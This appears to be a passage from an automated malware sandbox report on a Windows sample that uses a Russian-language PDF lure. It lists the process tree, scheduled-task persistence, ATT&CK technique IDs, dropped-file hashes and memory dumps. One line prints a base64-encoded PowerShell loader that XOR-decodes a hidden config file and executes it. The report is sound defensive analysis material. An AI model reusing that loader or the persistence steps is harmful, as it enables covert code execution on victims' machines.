        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D3DFB39543AF223E9A7C7E462073822D --mojo-platform-channel-handle=2408 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        6⤵
        
        PID:1740
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\45m4ghai\45m4ghai.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3212
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5A.tmp" "c:\Users\Admin\AppData\Local\Temp\45m4ghai\CSCB1E2DBF391D487AB0E1CAED14C8A2A3.TMP"
        5⤵
        
        PID:4968
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /TN WindowsActiveXTaskTrigger
      4⤵
      PID:540
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /RUN /TN WindowsActiveXTaskTrigger
      4⤵
      PID:4376

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\WinEventCom\manutil.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABtAGEAaQBuAD0AIgAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABXAGkAbgBFAHYAZQBuAHQAQwBvAG0AXABjAG8AbgBmAGkAZwAiADsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABtAGEAaQBuACkAKQB7AHIAZQB0AHUAcgBuADsAfQAkAGIAYQByAHIAYQB5AD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAG0AYQBpAG4AKQA7ACQAeABhAHIAcgBhAHkAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGIAYQByAHIAYQB5AC4AQwBvAHUAbgB0ADsAZgBvAHIAKAAkAGkAPQAwADsAJABpAC0AbAB0ACQAYgBhAHIAcgBhAHkALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeABBAEIAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeABGAEYAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeAAzADAAOwAkAHgAYQByAHIAYQB5AFsAJABpAF0APQAkAGIAYQByAHIAYQB5AFsAJABpAF0ALQBiAHgAbwByADAAeAAxADAAOwB9ADsAVAByAHkAewBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeABhAHIAcgBhAHkAKQB8AGkAZQB4ADsAfQBDAGEAdABjAGgAewB9AA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:660
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\240cyfjz\240cyfjz.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES19F0.tmp" "c:\Users\Admin\AppData\Local\Temp\240cyfjz\CSC38C099BC664BE68CB77E3BA3312527.TMP"
      4⤵
      PID:3804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e56df3b.rbs

Filesize
9KB

MD5
25569c623a28e621039ed70e0e2b1eed

SHA1
14ad996f4d541fc23841e1e1a33b5dff23b4372e

SHA256
f8d94109aa1ff7cb3c2c717525896700865810792a3cfad7110ef4cfb7b3cf8f

SHA512
57754c7ee9e4826e02be8095cd058fe131f86b949f9214247d9603529dd67f57a388def0dcd153e681f15aba1c1e4c42211cb20c46dd735b6612b9608474a61f

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
bc00dc749ed58ce073f98a0162d1043c

SHA1
79afcd22c61793bd3d636a6f4972a0dee451ee72

SHA256
b224ba1cadffdae305cfd21fab5e0be452a0f669088d4837f1d98349764677d4

SHA512
02235f826ea0e6e8fc317f0ba3d81e08cc34784f73d87a7b15e3ac4ec10558171a19b7637d0c287cd1b9095a15c992485baea3fc91dd3dceda12da775158f7c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d9354c0ecc25cc536dc17cf104e5812d

SHA1
d7a6ea646eedf560966406ddd533382b58423877

SHA256
001b0722e5c2c8005bf6b0b265c80be6a95ad9884833957b14f0b624e90ee6ee

SHA512
49f9c17d0b86ed4180e0dc6705d350a6cea6906a604efefdb2096697742b5070aed8e48cfaa8a78edc067ddb2d65c941ea8c41fb5ba3c174ac5af97470b0ce6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\240cyfjz\240cyfjz.dll

Filesize
3KB

MD5
91a087426894acf7e5cb1a7826c7e9ca

SHA1
4494f5d7c78fdbbbd7d6713739b36215a43e4c08

SHA256
a7ed6eea0d180cbf61a8a56f548ca41b433481ded1e0448bb81abd9f1557a00b

SHA512
667f2d4a45a7fc2ba4147fa1974b3616187da2e2449e3893b3b8219165de48abe263355d750d01b5e687e5272147c16430f3a7448deb0f9fe6ccce1723ee035f

Download Submit
C:\Users\Admin\AppData\Local\Temp\45m4ghai\45m4ghai.dll

Filesize
3KB

MD5
d3fb5198cc7d98d7856fa072c726d16a

SHA1
579d8b696322f1508300d330b925c3d3ec0571e2

SHA256
27f6e569aeebe6d351bd685369e6ad34430b826a746c290767620d0ff471c915

SHA512
9db9cdcb2dcd8d20cfcf3925cd2a48f2a7a9f47bc5ab1323594c56220b3e1c4cc7f4dc4062de519ddebfd1dd767737d96a10bde82874f9f2b224f4e8abfb54c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES19F0.tmp

Filesize
1KB

MD5
933eb309c690c64a3d82528b507cafbe

SHA1
90cee18724ace399e3f358f36b532ddf7c157136

SHA256
0bff2c6eae8962956338d28d4d15febff4308cc39d2f7e75de0ea46c1f5263a6

SHA512
4d2bc4173ced046794787cf3cf1f1ea9add4ed513024ddd4d2d73f05b9c4436bac75ffe8fb1f8598b221fb11a0e9da8eac37dfe31afcbb04c82d35bdfb34059a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB5A.tmp

Filesize
1KB

MD5
7cde820cedfcfd18f4d6a2559d275b5e

SHA1
711aafb11e4771094888da5405d5df42390a14a9

SHA256
5a9446c0223efd864f7d120aef0bf50a4f297ec12feca40ed0b23030c8d641c5

SHA512
b089c8721f207c557008ab8afe2d11808ad8e638abb7909dc8e0e95186638f84e54518385b9e4f3e4ec9031ed820914a3b90a00a53bea6d0285fd91227cd6de0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ukoevuri.0fg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\WinEventCom\config

Filesize
9KB

MD5
ab4d7aae358846880050ea7e37f52ac7

SHA1
6c0f5abb5531cd47313b21e461b190f6a39676a0

SHA256
ddf9f9cf92aa2cd47cd9aa708756e2233fbb0186480377ed6c37bdb66e0d1ec3

SHA512
0a0bfae046028f5439b9c30cb32596da585f3d84fb38959b66510f999ae3d51330be7357c7b23ddd7a19882ab568e21459a99805f59a2ac5db31a6dd5f4e6dfb

Download Submit
C:\Users\Admin\AppData\Local\WinEventCom\manutil.vbs

Filesize
1KB

MD5
8c2f5e7432f1e6ad22002991772d589b

SHA1
8b04e7b1608b7498e06905e62f03f5e23687d9eb

SHA256
5d008539c11d9e35e9851487e82a078bbf8a1bd19a7f5f1f5beb581b47c7ca91

SHA512
7c7eac0081ff7ce07ba96cd11f36f04e3386f2a176b4357c53384b72b7fcd0deacc477a20b5264b8b39f47d9348a5a8069a8acfff5b2e8576629b933d66e6bc1

Download Submit
C:\Users\Admin\AppData\Local\Приказ Минфина ДНР № 176.pdf

Filesize
111KB

MD5
79da5a4719f51837126bebd6c8f2714f

SHA1
36fbda3057119305f946a5f2949d442b33a3261c

SHA256
37309f7ea1877775b1d33e4d8fd43f5bbd49758af2c0400785d860c8036a0598

SHA512
01b6dcc10cf888084f4267b4bcc34e0b3b62ce50e09f903244757a819af83997b2fab9be755c464c89235f60f8c8383c272519950165dcad22f844266044935a

Download Submit
C:\Users\Admin\AppData\Roaming\WinEventCom\service_pack.dat

Filesize
23KB

MD5
e1f0082cb3d04c4a2a70ae02a158520c

SHA1
33a7244d072cf1d530a26d7d77bfe88615661ecd

SHA256
f405a26904d2f6aaf4ff5f24dc345a24751d13b691a0bf17ba8c94f08ebb8b5b

SHA512
2cf6bb9ba1c443797328159004c2f63ef70363e72fc3fe9aaee4a73a2d95f73a56cc30b2597d8d643370babaeaac46b24dbe59237a3ab866b61f0cb7eac8f0ca

Download Submit
C:\Users\Admin\AppData\Roaming\WinEventCom\Приказ Минфина ДНР № 176.pdf

Filesize
111KB

MD5
79da5a4719f51837126bebd6c8f2714f

SHA1
36fbda3057119305f946a5f2949d442b33a3261c

SHA256
37309f7ea1877775b1d33e4d8fd43f5bbd49758af2c0400785d860c8036a0598

SHA512
01b6dcc10cf888084f4267b4bcc34e0b3b62ce50e09f903244757a819af83997b2fab9be755c464c89235f60f8c8383c272519950165dcad22f844266044935a

Download Submit
C:\Windows\Installer\e56df39.msi

Filesize
166KB

MD5
fee3db5db8817e82b1af4cedafd2f346

SHA1
e6bcf68c7d55fc933e7a7e2ca1fb4e8fa1ad376d

SHA256
4808815cb03b5f31841c74755897b65ed03e56dbddbe0d1fed06af3710f32d51

SHA512
37bbe3176b6d793b2b140e6bb6989b322832bdd77869d86e071e7566902fa9f718a647c2fb347a8a79f1fd9b5d5fc376ba8ddfa516944c3134d351048853278c

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.0MB

MD5
9e74816186e81da5d158f5bc20dc6028

SHA1
c69d501a5822c181f45a649465d0c6eacb079a23

SHA256
4b50839a5e7b506c964c277b53330dc36a1d9336faccadd8f66251b8c47fef7b

SHA512
436603c47ef01eebab246af3c97719d99e3225fb816ceba9e9894edbd9bc32b7bd13bd19f5d46511886f5cad9d6bd9d62690ccbf224b08079bbc8380c7aa9268

Download Submit
\??\Volume{7e74cb8c-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{321a1bda-2cc3-4dbe-b13c-7e6a2027835e}_OnDiskSnapshotProp

Filesize
5KB

MD5
6cd5dc0534ec5b38ae20af21f39bb759

SHA1
8b428e823669a91570aa477d108071b466716474

SHA256
5ed98d300a8715256eca8f2c9c3a160b276ade30622f9eafbf6361df67d652f3

SHA512
3847fc4658e05cb8843778e8f8e91835365f8d44d1f9e7d5e589b49feaffe62f4889f6e4b4169f94889233ed2358459e65aca827af9c64a0bf80d1c831f92239

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\240cyfjz\240cyfjz.0.cs

Filesize
91B

MD5
c7f3bc82767e125b120f23fe5856722e

SHA1
e5143478a180c2bcc49034dae6536be2f7f7bb94

SHA256
f4e73f33fe74d354b87e76f481dbb2b12610820a308440c316b84ba0b4996c98

SHA512
fe480b21ec99713d5178d79db5f3129a0fc6d06d76e423c02623315453ad8224ea689bc53859da716dc7ecfcf41ec7832ca69f8088ace264c8967cf4ca4d8f98

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\240cyfjz\240cyfjz.cmdline

Filesize
369B

MD5
270fecbf2ea7ae06a09e3886bc4a96cb

SHA1
430bd6f5bbd4edfb7072924c4fd9a4defa438205

SHA256
a8d9617e19824d8c0823ee242bf16060023f45d28bdd795449744f12e77be6f8

SHA512
cfc428892afd4052a5ce7c600f4b87bc17c412dbf6a7d94037f7145d8e4466ecf421f1141e598bf0abdca9485986d0c558aa628391ad01c88232192d3c948fa3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\240cyfjz\CSC38C099BC664BE68CB77E3BA3312527.TMP

Filesize
652B

MD5
1110a43da402b1eb43310c36d036de6a

SHA1
964a1d3b9dd21aeb6a667ab4df60372fe6067c74

SHA256
2694f85d12da3e31e94157e982525a7d36322fb1f42cb97719ecfd61d4660d67

SHA512
10e855caa07fc10aef21190046419be0396db96ce1a61fa7f478fa7138bde24299885cd995b8e049395d97848ef2f1e9d3d5787fe511c4f36f3fc79043c222e9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\45m4ghai\45m4ghai.0.cs

Filesize
363B

MD5
1c84f1b08df842fa8b588b11f9221c94

SHA1
7dff1d05dfd1baa79823326f8b88598dd5cf5b6c

SHA256
c4e2044972dd7206a6561117d972945f2d4330072d4c7feea861c785576f9d16

SHA512
4b89ca9d512b1c713d6a8cb0fbb057e46493766452a850734f990bebabb00c78a12749e1dda6aa8ee4f00a0c35b7af93ae627c4e1b68b0eaca47e6b37b4bb502

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\45m4ghai\45m4ghai.cmdline

Filesize
369B

MD5
1e9fde2716e07d43be9babdf0a1680c9

SHA1
e3bdd9116457696d7e58ffdefc78919a67f0f87e

SHA256
83ce05deac13509369e63537dd5d6256c81700302ff62f8b3fa03ab79aca099d

SHA512
e714e4609b09c91cdd17be7e7cbbfff2bda881057e7f87257af3f7159b2b8eafc2362737b3ceb93da5068f354aebbf4318e7898e5ba1f286eca0baee919c1cb1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\45m4ghai\CSCB1E2DBF391D487AB0E1CAED14C8A2A3.TMP

Filesize
652B

MD5
f41a12978f8c4edefb68b5ea176aae24

SHA1
247e7514d4e061be5024d7cb3e06073f6cc4a3e4

SHA256
f52b364f1b7890fef0ce4c071da9e64e236dd0f0b5f4abc9a4509a8fd921acea

SHA512
d54a2bbab24939c59d73eadbfbe19b4b82e8e27368ad2b6d9a8b5f7122f7a33a45c7f1880c72c3896a2bd35d647dc7022d1626455ebcde29917771b6c1bb0e5b

Download Submit
memory/660-264-0x000001FEA12C0000-0x000001FEA12D0000-memory.dmp

Filesize
64KB

Download
memory/660-218-0x000001FEA12C0000-0x000001FEA12D0000-memory.dmp

Filesize
64KB

Download
memory/660-266-0x000001FEA12C0000-0x000001FEA12D0000-memory.dmp

Filesize
64KB

Download
memory/660-265-0x000001FEA12C0000-0x000001FEA12D0000-memory.dmp

Filesize
64KB

Download
memory/660-206-0x000001FEB93E0000-0x000001FEB9402000-memory.dmp

Filesize
136KB

Download
memory/660-216-0x000001FEA12C0000-0x000001FEA12D0000-memory.dmp

Filesize
64KB

Download
memory/660-217-0x000001FEA12C0000-0x000001FEA12D0000-memory.dmp

Filesize
64KB

Download
memory/2684-371-0x00000000096C0000-0x000000000996B000-memory.dmp

Filesize
2.7MB

Download
memory/2684-309-0x0000000008510000-0x0000000008531000-memory.dmp

Filesize
132KB

Download
memory/4252-178-0x0000000003260000-0x0000000003270000-memory.dmp

Filesize
64KB

Download
memory/4252-181-0x0000000008AA0000-0x000000000911A000-memory.dmp

Filesize
6.5MB

Download
memory/4252-179-0x0000000007E70000-0x0000000008414000-memory.dmp

Filesize
5.6MB

Download
memory/4252-169-0x0000000006280000-0x00000000062E6000-memory.dmp

Filesize
408KB

Download
memory/4252-177-0x0000000006DE0000-0x0000000006E02000-memory.dmp

Filesize
136KB

Download
memory/4252-163-0x00000000061A0000-0x0000000006206000-memory.dmp

Filesize
408KB

Download
memory/4252-162-0x00000000058A0000-0x00000000058C2000-memory.dmp

Filesize
136KB

Download
memory/4252-174-0x0000000006870000-0x000000000688E000-memory.dmp

Filesize
120KB

Download
memory/4252-205-0x0000000003260000-0x0000000003270000-memory.dmp

Filesize
64KB

Download
memory/4252-204-0x0000000003260000-0x0000000003270000-memory.dmp

Filesize
64KB

Download
memory/4252-160-0x0000000003260000-0x0000000003270000-memory.dmp

Filesize
64KB

Download
memory/4252-161-0x0000000005940000-0x0000000005F68000-memory.dmp

Filesize
6.2MB

Download
memory/4252-175-0x0000000007820000-0x00000000078B6000-memory.dmp

Filesize
600KB

Download
memory/4252-159-0x0000000003260000-0x0000000003270000-memory.dmp

Filesize
64KB

Download
memory/4252-176-0x0000000006D80000-0x0000000006D9A000-memory.dmp

Filesize
104KB

Download
memory/4252-158-0x00000000052D0000-0x0000000005306000-memory.dmp

Filesize
216KB

Download